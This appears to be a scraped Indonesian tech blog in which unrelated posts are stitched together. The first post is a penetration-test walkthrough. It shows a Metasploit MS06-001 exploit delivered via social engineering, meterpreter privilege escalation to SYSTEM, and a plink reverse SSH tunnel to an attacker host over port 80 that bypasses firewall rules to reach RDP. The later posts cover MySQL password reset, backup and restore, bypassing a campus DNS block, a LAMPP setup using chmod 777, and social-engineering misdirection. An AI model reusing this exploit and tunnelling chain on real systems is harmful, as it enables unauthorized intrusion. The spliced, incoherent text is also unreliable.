Tehnik tunneling juga dipakai oleh pentester untuk mendukung pekerjaan penetration test. Mari kita lihat tehnik ini berjalan.
Sebagai seorang pentester, saya ditugaskan untuk menjebol sistem sampe tuntas, termasuk jaringan internal target. Singkat cerita, saya telah mendapatkan remote shell dari sebuah komputer yang hanya dapat diakses dari satu subnet jaringan. Setelah ditelusuri, komputer target membuka port 3389 yang artinya service Remote Desktop sedang berjalan dan siap diakses. Namun karena komputer target berada pada jaringan NAT, maka koneksi langsung ke port 3389 akan segera diblok oleh Gateway/Firewall. Saya mencoba koneksi reverse connect dengan netcat, namun yang menjadi penghalang, ternyata OUTBOUND rule pada firewall hanya memperbolehkan koneksi ke port 80 dan 443, selain itu di blok. Untuk itulah saya terpikir untuk menggunakan SSH Tunneling, sebuah server SSH saya siapkan untuk listening di port 80. OIya, saya menggunakan Backtrack untuk melakukan ini semua

Eksploitasi sukses dilakukan dengan Metasploit dengan sedikit metode Social engineering terhadap salah satu staff di perusahaan tersebut. Metasploit memberikan saya sebuah remote back shell meterpreter yang multifungsi.

msf exploit(ms06_001_wmf_setabortproc) > exploit
[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[*] Started reverse handler on 203.128.250.15:4444
[*] Using URL: http://203.128.250.15:80/register.html
[*] Server started.
[*] Sending exploit to 203.128.250.15:51368...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (203.128.250.15:4444 -> 203.128.250.15:54652)

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  203.128.250.15:4444 -> 203.128.250.15:54652

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: ITUSR-54\admin
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Setelah mendapatkan akses setara dengan SYSTEM, saya mengupload ssh client yang terdapat dalam paket Putty, yaitu plink.exe.

meterpreter > upload /pentest/windows-binaries/tools/plink.exe C:\\windows\
[*] uploading  : /pentest/windows-binaries/tools/plink.exe -> C:\\windows\
[*] uploaded   : /pentest/windows-binaries/tools/plink.exe -> C:\windows\
meterpreter >

Setelah itu saya mengakses shell pada target, dan mengeksekusi SSH client untuk segera membuat tunneling ke server SSH yang telah saya siapkan sebelumnya.

meterpreter > execute -f cmd -c -H
Process 1776 created.
Channel 2 created.
meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\admin\Desktop>plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
plink -P 80 -l root -pw toor -C -R 3389:127.0.0.1:3389 203.128.250.15
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's key fingerprint is:
ssh-rsa 2048 ce:bf:86:ed:50:68:bf:21:8f:c2:a9:63:9f:07:d5:0c
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
connection.
Store key in cache? (y/n) y

BackTrack 4 (PwnSauce) Penetration Testing and Auditing Distribution

Last login: Wed Feb 24 23:04:29 2010 from 10.5.5.243
root@bt:~#

Terlihat bahwa koneksi SSH telah terbentuk (pada port 80) antara target dengan komputer saya, ditandai dengan keluarnya shell Backtrack saya pada komputer target. Pada komputer saya, juga segera terbentuk port 3389 yang listening di 127.0.0.1 (localhost). Sampai saat ini, port 3389 service Remote Desktop komputer target telah berhasil di tunneling ke komputer saya dengan port yang sama, namun melewati koneksi SSH.

tom@bt:/$ rdesktop 127.0.0.1
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

Tehnik tunneling sangat berguna untuk berbagai keadaan, salah satunya adalah situasi diatas.

Tehnik lainnya akan segera menyusul

Second Life adalah aplikasi virtual 3d berbasis internet yang diluncurkan pada tahun 2003. Second Life di kembangkan oleh perusahaan Linden Research, inc. Sebuah program klien yang gratis yang disebut Second Life Viewer memungkinkan para penggunanya disebut ‘Residents’, untuk berinteraksi dengan satu sama lain melalui avatar. Residents dapat mengeksplorasi, bertemu penduduk lain, bersosialisasi, berpartisipasi dalam kegiatan baik individu maupun kelompok, serta membuat dan memperdagangkan properti virtual dan jasa satu sama lain, atau melakukan perjalanan di seluruh dunia, yang mana Residents terhubung sebagai grid. Second Life diperuntukan kepada orang yang berusia 18 tahun ke atas, sementara Teen Second Life bagi yang berusia 13 hingga 17 tahun.

Dibangun dengan konsep software tiga dimensi alat pemodelan yang didasarkan pada bentuk geometri sederhana yang memungkinkan Residents untuk membangun objek virtual. Ini dapat digunakan dalam kombinasi dengan Linden Scripting Language yang dapat digunakan untuk menambah fungsionalitas ke obyek. Lebih kompleks seperti patung tiga dimensi prims (bahasa sehari-hari dikenal sebagai sculpties), tekstur untuk pakaian atau benda lainnya, dan animasi dan gerakan dapat dibuat menggunakan software eksternal. The Second Life Terms of Service memastikan bahwa pengguna memiliki hak cipta untuk setiap konten yang mereka ciptakan, dan server dan klien menyediakan fungsi-fungsi manajemen hak digital sederhana.

(source : wikipedia.org , translated by : andenaru)

My Quote :

Walaupun sepertinya tidak seramai Facebook namun aplikasi ini sepertinya menjadi varian baru dalam suasana menjalin jaringan sosial masing – masing individu yang membuat user menjadi lebih nyaman dan lebih membebaskan imajinasi.

Aplikasi ini juga sepertinya dapat menjadi ladang besar bagi para developer untuk mengembangkan objek – objek virtual lainnya untuk kepentingan berbagai macam aspek seperti pendidikan, bisnis, dll.

Gw sendiri sedang mencoba memainkan second life walaupun masih bingung mencari groups, places atau showcase yang full indonesian people hehehehe. see you on the Second Life!!!

Sebenarnya ini bukanlah sesuatu yang sulit, namun tetap saya akan jelaskan, untuk berjaga-jaga kalau suatu hari menemukan kasus serupa dan ternyata saya lupa.

Kurang lebih langkah-langkahnya adalah sebagai berikut (windows based) :

1. Masuk sebagai administrator ke windows.
2. Hentikan servis MySQL (Jika MySQL Server terinstall sebagai servisdi windows) di Control Panel>Administrative Tools>Services, lalu carilah service bernama MySQL kemudian STOP. Atau bila tidak berhasil gunakanlah Task Manager(ctrl+alt+del) untuk menghentikan proses atau aplikasi MySQL Server yang berjalan.
3. Buatlah sebuah file teks dengan menggunakan notepad, kemudain salin statemen di bawah ini ke dalam notepad.Isikan Password (MyNewPass) dengan password baru yang anda inginkan, atau biarkan kosong (‘ ’). UPDATE mysql.user SET Password=PASSWORD(’MyNewPass’) WHERE User=’root’;
   FLUSH PRIVILEGES;

   Update berfungsi untuk mengganti field password pada tabel User. Dan kemudian Flush berfungsi untuk merefresh tabel yang ada di server.

1. Kemudian simpan file dengan nama apa saja, dalam kasus ini file saya simpan dengan nama mysql-init.txt . Dan dapat disimpan dimana saja (pada kasus ini disimpan di c:\mysql-init.txt untuk mempermudah penulisan path dan pencarian file).
2. Kemudian masuk ke folder bin dari direktori MySQL dimana terletak file mysqld.exe, kemudian jalankan perintah untuk menyalakan MySQL dengan Option tambahan–init-file :
   C:\mysql\mysql server 5.1\bin\mysqld.exe –init-file=c:\mysql-init.txt
   Atau
   C:\mysql\mysql server 5.1\bin\mysqld.exe –default-file=c:\program files\mysql\mysql server 5.1\my.ini –init-file=c:\resetMySQL.text
   (apabila MySQL diinstall secara terpisah)
   
3. Kemudian aktifkan kembali servis windows untuk MySQL, dan masuklah dengan password yang baru anda ganti.
4. Restart database dan password baru pun dapat anda gunakan..

Mohon maaf yah kalo tutorialnya terlau singkat n gk ada gambarnya, selamat mencoba dan semoga berhasil.hehehe

sudo apt-get install mysql-admin
sudo apt-get install mysql-query-browser

Nah kalo mao install gk pake via synaptic, saya perefer donlod di sini , dengan catatan harus menjadi member dr Mysql dulu pastinya.
kalau sudah ketikan perintah seperti di bawah:

tar -xvf mysql-gui-tools-5.0r12-linux-i386.tar.gz /opt/mysql-gui-tools

kemudian untuk menjalankannya :

/opt/mysql-gui-tools-5.0/mysql-administrator
/opt/mysql-gui-tools-5.0/mysql-query-browser

ini merupakan salah satu contoh tampilan login untuk mysql-administrator:

yang dilingkari merupakan path dari mysql.sock, menurut penjelasan yang saya dapat, kalo di OS *Nix ada
resource yang namanya socket, itu digunakan untuk interkneksi antar proses disuatu mesin, dalam hal ini mysql server(localhost) dan mysql-admin(tools).
Nah klo di windoz itu biasa di sebut named pipe.

NB: field connecting using socket file wajib diisi apabila anda menginstall MySQL bundling dengan aplikasi lain
ex: lammp
yang mana ditakutkan path socketnya tidak dikenal oleh MySQL GUI Tools atau ketika ada tampilan eyoy seperti ini:

Could not connect to host ‘localhost’.
MySQL Error Nr. 2002
Can’t connect to local MySQL server through socket ‘/tmp/mysql.sock’ (2)

Click the ‘Ping’ button to see if there is a networking problem.

Untuk mengetahui letak mysql.sock lebih tepatnya silahkan lihat file my.cnf

Mungkin baru ini saja ilmu yang masih saya miliki, mohon bimbingan dan koreksinya apabila ada kesalahan dalam tulisan ini.

original post @ here from http://mayo1210.wordpress.com

mysql -u root -p password  nama_db < file_backup.sql

Syntax diatas diketikan pada comand promp di windows, di Ubuntu(linux) juga hampir sama. Begitu perintah di atas dieksekusi database secara keseluruhan (tergantung isi dari file_backup.sql-nya) langsung kembali di MySQL Server. berikut saya akan cuba melakukan restore dengan MySQL GUI Tools, sesuai judul,hehehe.

1. Langkah pertama adalah kita memilih opsi restore (seperti pada gambar di bawah) setelah berhasil login ke MySQL Administrator
   
2. Nah kemudian setelah itu kita pindah ke jendela sebelahnya dan menentukan file backup yang akan diseksekusi
   
3. Kemudian di tab sebelahnya ada pilihan Restore Content (sebenarnya ini optional, hanya saja jika memang dibutuhkan. Tidak ada salahnya juga menjelaskan sesuatu yang mungkin bermanfaat . Tab ini Masih Kosong kan yah?? pencet deh tuh tombol analyze backup fungsinya untuk melihat struktur tabel pada database yang akan kita restore. Di menu ini anda dapat menentukan tabel yang di restore keseluruhan atau hanya sebagian saja.
   
4. Bila anda telah menentukan table tertentu atau keseluruhan yang akan  di restore, kemudian barulah anda dapat memulai start restore.
   

Sekian tulisan sederhana dari saya mengenai restore database MySQL dengan menggunakan MySQL GUI Tools, kalo ada yang ingin ditanyakan silahkan mengisi komen dari postingan ini, insyaallah sebisa mungkin akan dijawab oleh yang ahli di bidangnya, saya mah baru belajar 1 jam yang lalu.

kurang lebihnya mohon maaf  jika ada salah-salah kata. Semoga bermanfaat

save

Pasti temen-temen pada bingung nih, kenapa ada postingan kurang berbobot macam ini.  Gambar di sebuah artikel dapat membantu memberikan ilustrasi kepada seorang pembaca sekaligus menghilangkan kejenuhan akan banyaknya tulisan ketika membaca artikel tersebut. Melampirkan sebuah gambar pada suatu postingan di sebuah blog umumnya cukup mudah, biasanya tiap blog telah menyiapkan fitur untuk mengupload Image/gambar, namun setiap blog provider (wordpress.com,blogspot.com, dll) umumnya memiliki batasan untuk file upload di setiap account yang kita miliki. Terlebih lagi bagi yang memiliki hosting dengan kapasitas kecil, tentu ini akan menjadi kenadala untuk sebagian orang.

Latar Belakang

Di kampus kami kami tidak dapat menggunakan koneksi internet semena-mena (baca foya-foya bandwith) soalnya bandwith yang tersedia digunakan untuk khalayak ramai, jadi agar tidak habis tersedot di satu sumber (titik), maka beberapa site yang membutuhkan bandwith yang cukup banyak untuk di tampilkan (ex: youtube, image hosting, file hosting, dll) di block menggunakan DNS , DNS yang digunakan adalah Open DNS. Sehingga kami yang menggunakan hosting dengan spcae tergolong kecil tidak dapat mengupload foto/image dengan semena-mena hehehehe.

Inti

Dengan ini saya coba memberikan sebuah solusi, tentunya salah satu dari banyaknya solusi yang ada. Yakni mengupload suatu file image/gambar yang telah di upload di file hosting atau online galery tanpa ter-block oleh DNS. Oke, di sini saya menggunakan flickr sebagai image hostingnya, walaupu sebenarnya flickr bukan image hosting melainkan galeri foto online. yang sudah pasti harus kita miliki adalah email yahoo. berikut adalah tahapannya :

1. Login ke flickr dengan account yahoo anda

2. Kemudian mulailah mengupload gambar yang anda inginkan dilanjutkan dengan mengupload

3. Lalu setelah di upload masuk ke photo stream tempat photo2 yang telah anda upload, kemudian setelah itu pilih foto yang akan di masukan ke blog, kemudian klik “share this” di sebelah kanan atas, pilih option “Grab The HTML” kemudian copy-kan tag html yang diblog, namun jangan semuanya, cukup <img …………. /> sampai sebelum tag </a>

4. Nah kalo udah tinggal copy tag yang <img…….> tadi ke artikel yang akan kita posting, namun jangan lupa tampilan penulisan artikelnya harus di rubah dulu ke mode HTML, barulah di paste. Dan Jrengg,,jrenggg,, gambar teraplot tanpa terblok oleh Open DNS

Simple bgt kan yah tulisannya. kebanyakan basa-basinya. Kalo ada kata-kata yang kurang berkenan mohon maaf sebelumnya.

MySQL merupakan database open source paling populer di dunia, apalagi karena statusnya yang Opensource(kecuali versi enterprisenya) dan menurut saya yang terbaik dari keberadaan MySQL adalah dukungan secara tak langsung terhadap Kewirausahaan(Enterpreneurship) yang  mandiri, dan tentu saja hal ini sejalan dengan arah kebijakan pemerintah kita yang ingin menggalakan kewirausahaan mandiri, yang salah satu indikatornya akan dibangun banyak SMK diseluruh penjuru negeri. Maka dari itu ada baiknya masyarakat yang ingin terjun di dunia IT(Information Technology) di Indonesia sebaiknya menguasai salah satu tools opensource yang satu ini.

Latar Belakang

Stigma yang sering saya dengar adalah seperti “harga gak pernah bohong”, “harga berbanding lurus dengan kenyamanan serta kualitas” dan masih banyak stigma-stigma lainnya yang selalu mengedepankan harga disamping kualitas/kenyamanan.Memang saya akui ada beberapa poin/kasus dari stigma-stigma yang ada, memang banyak yang sesuai, namun itu tidak berlaku bagi MySQL, karena MySQL memiliki banyak support independent yg dilakukan oleh para pendukung/penggunanya, sebut saja MySQLCC, PHPmyAdmin, dan masih banyak lagi, namun sebelum MySQL dibeli oleh Sun Microsystem, MySQL merupakan aplikasi database yang tidak bisa dibilang mudah untuk newbie karena semuanya dioperasikan menggunakan script/console sebagai teknik manipulasinya, hal ini menyebabkan kendala tersendiri bagi orang-orang yang umumnya terbiasa menggunakan GUI based, maka dari itulah tujuan postingan kali ini yaitu untuk menunjukan teknik backup database dengan mengggunakan GUI dan tentunya sekalian menunjukan bahwa produk OSS(Open Source Software) tidak kalah dengan produk berbayar.

Pembahasan Topik

Biar wawasan kita makin luas dan semakin banyak pilihan yang bisa dilakukan maka saya akan mencoba menyisipkan sebaris kode untuk melakukan backup dengan cara berbasis console :

mysqldump -u username -p password namaDB > F:\backupDB\namaDBBackup.sql

penjelasan dari syntax di atas adalah setelah syntax -u adalah username dari DB(database) dan -p adalah password dari DB, yang diikuti dengan nama DB yang akan di backup dan setelah simbol  ‘>’ adalah letak dan nama backup dari database yang akan dibackup, mudahkan? yap as easy as that, hanya saja bagi newbie yang tujuannya baru ingin mencoba-coba akan kesulitan dan terlanjur tidak nyaman, bahkan beberapa yang skeptis secara psikologis akan menganggap tools ini hanya untuk yang sudah ahli.  Sebelumnya silakan download di sini

1. Okay let’s start to the real topics, tahapan pertama dalam menggunakan MySQL GUI tools tentu saja mendownload dan menginstall(just kidding:P), tahap awal adalah masuk ke halaman MySQL Administrator dengan memasukan username dan  password dari MySQL anda.
2. Tahapan kedua pilih icon backup sepeti gambar dibawah ini :



3. tahap ketiga adalah ikuti prosedur dari gambar dibawah ini sesuai urutan nomor yang ditunjukan tanda panah. <1> Buat project baru, <2>Plilh DB yang akan dibackup, <3>Beri nama project backup sesuai keinginan, <4.>Klil tanda ‘>’ untuk menandakan DB yang akan di backup, <5.>Bila semua prosedur sudah dilalui pilih tombol Execute Backup Now



4. Bila tombol <5.> ditekan maka akan menghasilkan gambar seperti di bawah ini dan anda bebas menyimpannya dengan nama apapun sekehendaknya, dan jangan lupa secara default nama file yang dihasilkan akan selalu unik sebab merupakan kombinasi tahun+bulan+tanggal+waktu dibuat.



5. Tahap kelima ini sifatnya optional, saya cuma menyarankan untuk menyimpan project yang telah kita buat, apalagi bila backup dilakukan secara berkala caranya ialah dengan menekan tombol Save Project(letaknya disebelah kiri Execute Backup), bila telah tersimpan maka akan terlihat seperti dibawah ini.

Penutup

Dengan ini saya harap akan makin banyak kawan-kawan yang berminat pada OSS, sebab bagi negara seperti kita OSS merupakan solusi dari permasalahan pengembangan IT di Indonesia, sebab software berbayar terlalu mahal bagi masyarakat pada umumnya, namun jangan lupa juga bila kita mengembangkan OSS bila panetrasinya ingin berhasil dan bermanfaat bagi orang banyak ada baiknya kita memberikan kenyamanan pada pengguna, layaknya yang dilakukan software berbayar;)

Tapi adakalanya ada beberapa aplikasi yang tidak dapat diinstall melalui synaptic salah satunya adalah LAMPP stands for (Linux Apache Mysql PHP) kalau di Windows kita kenal XAMPP bisa di donlod di sini nah kalo sudah sekarang waktunya instalasi..

1. hayoooo kita masuk ke terminal yuukk.. .Kalo sudah pindah ke directory tempat paket instalasi berada
2. Log In sebagai root (its a must)
3. nah kalo udah ketik deh tuh di terminal tar xvfz xampp-linux-1.7.1.tar.gz -C /opt
   maksud dar perintah tar adalah untuk mengekstrak paket yang berupa tar.gz jangan tanya kenapa di install di directory /opt, karena blum cukup berkompeten untuk menjawab pertanyaan tsb.hehe(jangan mencoba menggunakan tools dari microsoft windows untuk mengekstrak paket ini karena tidak akan berhasil,DIJAMIN!!!)
   
4. kalo udah terinstal cek dengan  /opt/lampp/lampp start, maka akan terlihat seperti dibawah ini seharusnyaStarting XAMPP 1.7.1...
   LAMPP: Starting Apache...
   LAMPP: Starting MySQL...
   LAMPP started..
5. kalo sudah bisa dicoba mengakses localhost melalui browser dengan mengetikan localhost di address bar
6. nah sekarang coba buat sebuah folder untuk project anda di folder /opt/lampp/htdocs/X (dalam hal ini misalkan folder X). Pastinya tidak akan bisa karena permision file belum dirubah untuk user root pada file sistem(dapat di cek dengan mengetikan ls -l pada terminal anda). Maka dari itu kita harus merubah file permision itu untuk dapat diakses,baca,tulis dan hapus oleh root dengan mengetikan chmod 777 nama folder/file yang ingin diganti permissionnya.bila anda kurang yakin dapat di cek kembali dengan ls -l pastikan file/folder yang hendak anda modifikasi memiliki semua hak akses untuk root (drwxrwxrwx)
7. Barulah sekarang anda dapat menuliskan file pada folder di htdocs karena kalau langkah-langkah di atas belum dilakukan kita tidak akan menuliskan file di document root pada webserver.
8. Tambahan untuk mengakses MySql dari terminal tidak semudah seperti mengakses pada windows ketikan cd/opt/lampp/bin
9. kemudian bila sudah masuk ke direktori bin dapat ketikan ./mysql  -h localhost -u root -p dan mysql admin pun siap digunakan.

Di linux memang agak berbeda untuk melakukan instalasi atau hal lain yang berhubungan dengan pengaksesan file system harus melalui previllage atau login sebagai root , agak berbeda dengan windows sebagai OS “Next Generation” (instalasi dengan cara next…next…next……….finish  hehehe) tapi karena itu juga Linux menjadi lebih aman dari serangan malware-malware yang sangat mengganggu.

Semoga artikel singkat ini dapat membantu teman-teman,khususnya yang baru menggunakan linux(ubuntu 9.04). Bila ada salah-salah kata tolong langsung dikomentari atau dikritik, maklum masih baru belajar linux.

Gabriel: Have you ever heard of Harry Houdini? Well he wasn’t like today’s magicians who are only interested in television ratings. He was an artist. He could make an elephant disappear in the middle of a theater filled with people, and do you know how he did that? “Misdirection”
Stanley: What are you talking about?
Gabriel: Misdirection. What the eyes see and the ears hear, the mind believes.

Seringkali kita melihat, mendengar dan mempercayainya dalam pikiran sesuatu yang sebenarnya adalah sebuah pengalihan perhatian. Semua prinsip-prinsip yang di lakukan sangat membutuhkan perhatian dan konsentrasi tinggi sehingga Anda tidak menyadarinya bahkan ketika melihatnya. Sangat sulit untuk melawan pengalih perhatian secara sadar, karena hal itu didasari oleh sifat manusia. Saya tahu jika anda mendengar suara keras dari belakang anda, anda akan menoleh kearah itu. Pengalihan perhatian sama persis seperti itu. Namun tidak selalu tampak seperti itu, tapi akan memiliki efek yang sama. Pengalihan perhatian bekerja dengan baik karena telah dipikirkan dengan matang. Tidak selamanya pengalihan perhatian itu sesuatu yang buruk, Anda dapat mengambil keuntungan dengan menerapkan disiplin dalam pengalihan perhatian. Apabila anda seorang pendidik, trainer, dosen atau sesuatu yang ada hubungannya dengan proses pembelajaran, anda dapat mengendalikan perhatian siswa anda setiap saat.

Apabila diterapkan dalam aktivitas Social Engineering tindakan pengalihan perhatian seperti ini bila dilakukan oleh seorang yang berniat jahat akan sangat membahayakan.

Berikut ini adalah contoh pengalihan perhatian yang sederhana :

1. Berapa banyak jari yang dimiliki seseorang pada kedua tangannya ?
2. Berapa banyak jari pada 10 tangan ?

Jika Anda seperti kebanyakan orang. Anda akan menjawab 10 dan 100. Jawaban pertama benar. Jawaban kedua salah. Kembali dan baca ulang. Contoh sederhana ini menunjukkan bagaimana pengalihan perhatian dalam skala kecil. Pertanyaan pertama mengarahkan Anda kepada pola tertentu dan menaruh Anda dalam suatu cara berpikir tertentu. Ketika Anda mendapatkan pertanyaan kedua, Anda menjawab berdasarkan jawaban pertanyaan pertama, yaitu : 10 x 10 = 100. Kelihatan mudah.

Itulah pengalihan perhatian, Sangat sederhana.

Pada saat mencapai garis akhir, Anda baru menyadari bahwa Anda telah kehilangan beberapa informasi selama perjalanan .

*btw..Jawaban pertanyaan kedua permainan di atas adalah 50.

1. Kenali jaringan yang akan anda lakukan troubleshoot (minimal melihat topologi yang ada)
2. Lakukan pengecekan yang sederhana untuk memastikan bahwa network yang sedang bermasalah dapat ditangani dengan cara yang sederhana terlebih dahulu dengan cara seperti berikut :
   1. Pengecekan di Layer 1 dan 2 : arp –a, netstat –e, lihat status link
   2. Pengecekan di Layer 3 : ipconfig atau ifconfig, ping. traceroute
   3. Pengecekan di Layer 4 : Telnet ke port, lakukan portscan
   4. Pengecekan di Layer 7 : Cek aplikasi yang digunakan
3. Apabila langkah tersebut diatas sudah dilakukan, mulai jalankan aplikasi analyzer (misalnya, Wireshark). Hal penting yang yang harus diperhatikan adalah bahwa anda harus sudah memahami :
   1. Prinsip-prinsip dasar dari TCP/IP (three way handshake, TCP Flag)
   2. Protokol (UDP,TCP,ICMP)
   3. Port dari protokol tersebut diatas
4. Lalu perhatikan gejala2 apa yang pada lalu lintas paket di dalam LAN
   (Misalnya : SYN no SYN+ACK, SYN immediate response RST, SYN SYN+ACK ACK )
5. Setelah menemukan gejala tersebut, lalu telusuri dimana gejala tersebut muncul (perhatikan Source IP & Port)
6. Dan yang terakhir dari adalah apa yang ditimbulkan dari gejala2 tersebut terhadap LAN :
   1. Jaringan menjadi lambat
   2. Aplikasi tertentu tidak dapat di akses
   3. Paket hilang
   4. Low throughput
   5. dll
7. Hasil dari analisa anda dapat digunakan untuk mendukung anda untuk memberikan sebuah hipotesa apa yang terjadi di LAN dapat dilakukan diambil tindakan dalam menyelesaikan masalah tersebut.
8. Untuk mempermudah anda melakukan analisa paket dan mendapatkan sebuah hipotesa, saya berikan sebuah MindMap.